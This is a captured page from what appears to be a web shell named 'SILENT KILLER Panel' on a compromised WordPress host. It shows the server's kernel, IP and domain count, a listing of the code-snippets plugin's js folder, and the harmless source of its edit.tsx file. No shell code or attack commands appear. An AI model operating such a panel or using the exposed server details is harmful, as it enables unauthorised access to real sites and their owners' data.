SILENT KILLERPanel

Current Path: > home > codekrsu > > shopceylon.store > wp-content > plugins > code-snippets > > js


Operation   : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Software     : Apache
Server IP    : 162.0.232.56 | Your IP: 216.73.216.111
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: /home/codekrsu//shopceylon.store/wp-content/plugins/code-snippets//js

NameTypeSizeLast ModifiedActions
components Directory - -
hooks Directory - -
services Directory - -
types Directory - -
utils Directory - -
edit.tsx File 358 bytes November 27 2024 21:52:46.
editor.ts File 529 bytes November 27 2024 21:28:50.
manage.ts File 213 bytes November 27 2024 21:52:46.
mce.ts File 2783 bytes November 27 2024 21:28:50.
prism.ts File 899 bytes February 14 2025 13:16:14.
settings.ts File 136 bytes November 27 2024 21:52:46.

Reading File: /home/codekrsu//shopceylon.store/wp-content/plugins/code-snippets//js/edit.tsx

import React from 'react'
import { createRoot } from 'react-dom/client'
import { SnippetForm } from './components/SnippetForm'

const container = document.getElementById('edit-snippet-form-container')

if (container) {
	const root = createRoot(container)
	root.render(<SnippetForm />)
} else {
	console.error('Could not find snippet edit form container.')
}

SILENT KILLER Tool